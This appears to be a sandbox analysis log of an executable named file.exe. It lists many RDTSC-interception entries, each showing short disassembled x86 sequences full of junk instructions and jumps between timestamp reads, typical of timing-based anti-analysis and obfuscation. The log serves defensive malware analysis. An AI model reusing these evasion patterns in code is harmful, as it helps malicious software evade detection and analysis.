Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5E3 second address: 127A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5E9 second address: 127A5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C018Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B904 second address: 125B908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9D3 second address: 125C9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B908 second address: 125B912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DB44 second address: 125DB48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9D7 second address: 125C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B912 second address: 125B916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9DD second address: 125C9F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DB48 second address: 125DBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C018Ch 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3199h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F67787C0188h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 or dword ptr [ebp+1246D150h], eax 0x0000003f mov esi, dword ptr [ebp+122D1E22h] 0x00000045 popad 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d xor dword ptr [ebp+122D27BAh], edx 0x00000053 mov ebx, 13F66866h 0x00000058 mov eax, dword ptr [ebp+122D0CD1h] 0x0000005e mov dword ptr [ebp+12458764h], edx 0x00000064 push FFFFFFFFh 0x00000066 or ebx, dword ptr [ebp+1247CB69h] 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DBC2 second address: 125DBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DBC8 second address: 125DBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1260A6E second address: 1260A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1260A74 second address: 1260A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1261B18 second address: 1261B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6778CEBE52h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F6778CEBE54h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EFF4 second address: 127EFFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EFFE second address: 127F008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F008 second address: 127F025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C0192h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F30D second address: 127F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F313 second address: 127F318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F48A second address: 127F48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F48F second address: 127F49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EA76 second address: 127EA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6778CEBE46h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EA83 second address: 127EA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F906 second address: 127F916 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6778CEBE48h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD51 second address: 127FD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD57 second address: 127FD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD5B second address: 127FD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1282C0C second address: 1282C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1A1 second address: 128A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1A5 second address: 128A1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F6778CEBE46h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6778CEBE4Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1D8 second address: 128A1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A32E second address: 128A333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A333 second address: 128A351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A351 second address: 128A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A4C8 second address: 128A4D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128AA66 second address: 128AA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE50h 0x00000009 jmp 00007F6778CEBE4Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128AD93 second address: 128ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0199h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128ADB0 second address: 128ADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE50h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128B2BC second address: 128B2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC00 second address: 124EC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC05 second address: 124EC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124ED4F second address: 124EDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov ecx, dword ptr [ebp+122D368Fh] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 add dword ptr [ebp+122D19EBh], esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jmp 00007F6778CEBE4Bh 0x00000025 mov dword ptr [ebp+124929A0h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F6778CEBE48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 cmp dword ptr [ebp+122D2BC5h], 00000000h 0x0000004c jne 00007F6778CEBF22h 0x00000052 and cx, A677h 0x00000057 mov byte ptr [ebp+122D3673h], 00000047h 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 call 00007F6778CEBE48h 0x00000066 pop edx 0x00000067 mov dword ptr [esp+04h], edx 0x0000006b add dword ptr [esp+04h], 00000017h 0x00000073 inc edx 0x00000074 push edx 0x00000075 ret 0x00000076 pop edx 0x00000077 ret 0x00000078 mov edx, 5BAD99B3h 0x0000007d mov eax, D49AA7D2h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F6778CEBE4Dh 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EDF1 second address: 124EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EE06 second address: 124EE10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2A0 second address: 124F2CC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 09893DA6h 0x00000011 mov dx, 86EAh 0x00000015 push F55E9819h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F67787C018Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2CC second address: 124F2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2E4 second address: 124F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F448 second address: 124F4AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F6778CEBE48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D327Bh], edx 0x00000028 nop 0x00000029 pushad 0x0000002a jmp 00007F6778CEBE50h 0x0000002f jmp 00007F6778CEBE4Bh 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F6778CEBE57h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5A8 second address: 124F5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F67787C0186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5B2 second address: 124F5C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5C4 second address: 124F5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5CA second address: 124F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6778CEBE46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5E5 second address: 124F618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F67787C0196h 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F67787C0186h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FD4E second address: 124FD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FD52 second address: 124FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FEFE second address: 124FF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FFD9 second address: 1250043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b push esi 0x0000000c or dh, FFFFFF91h 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 lea eax, dword ptr [ebp+1249298Ch] 0x00000017 jmp 00007F67787C018Ch 0x0000001c mov edx, 1FE92BF9h 0x00000021 push eax 0x00000022 jmp 00007F67787C0199h 0x00000027 mov dword ptr [esp], eax 0x0000002a mov ecx, dword ptr [ebp+122D3679h] 0x00000030 lea eax, dword ptr [ebp+12492948h] 0x00000036 mov edx, 6C6BC291h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007F67787C0188h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250043 second address: 125004D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125004D second address: 123230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F67787C0197h 0x0000000e call dword ptr [ebp+122D17E5h] 0x00000014 push ecx 0x00000015 jmp 00007F67787C0192h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c jp 00007F67787C018Eh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129076C second address: 1290790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6778CEBE4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE4Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290912 second address: 1290918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290918 second address: 129091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290EBD second address: 1290ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290ECE second address: 1290EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6778CEBE48h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F6778CEBE52h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6778CEBE46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290EF8 second address: 1290EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293765 second address: 129376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129376A second address: 1293782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 jnl 00007F67787C0186h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293485 second address: 129348B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129348B second address: 129348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129348F second address: 129349B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129349B second address: 129349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12960A2 second address: 12960A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961CC second address: 12961D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961D0 second address: 12961E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6778CEBE4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961E4 second address: 12961EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129636F second address: 1296373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296373 second address: 12963AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0192h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F67787C0198h 0x00000011 jnl 00007F67787C0186h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296562 second address: 1296570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F6778CEBE46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296570 second address: 1296574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C0F8 second address: 129C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C0FC second address: 129C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0196h 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F67787C0186h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C129 second address: 129C140 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F6778CEBE46h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C140 second address: 129C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C146 second address: 129C155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F6778CEBE46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C155 second address: 129C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C159 second address: 129C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B563 second address: 129B567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B567 second address: 129B571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B571 second address: 129B57B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C018Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B849 second address: 129B84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B84D second address: 129B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F67787C0195h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
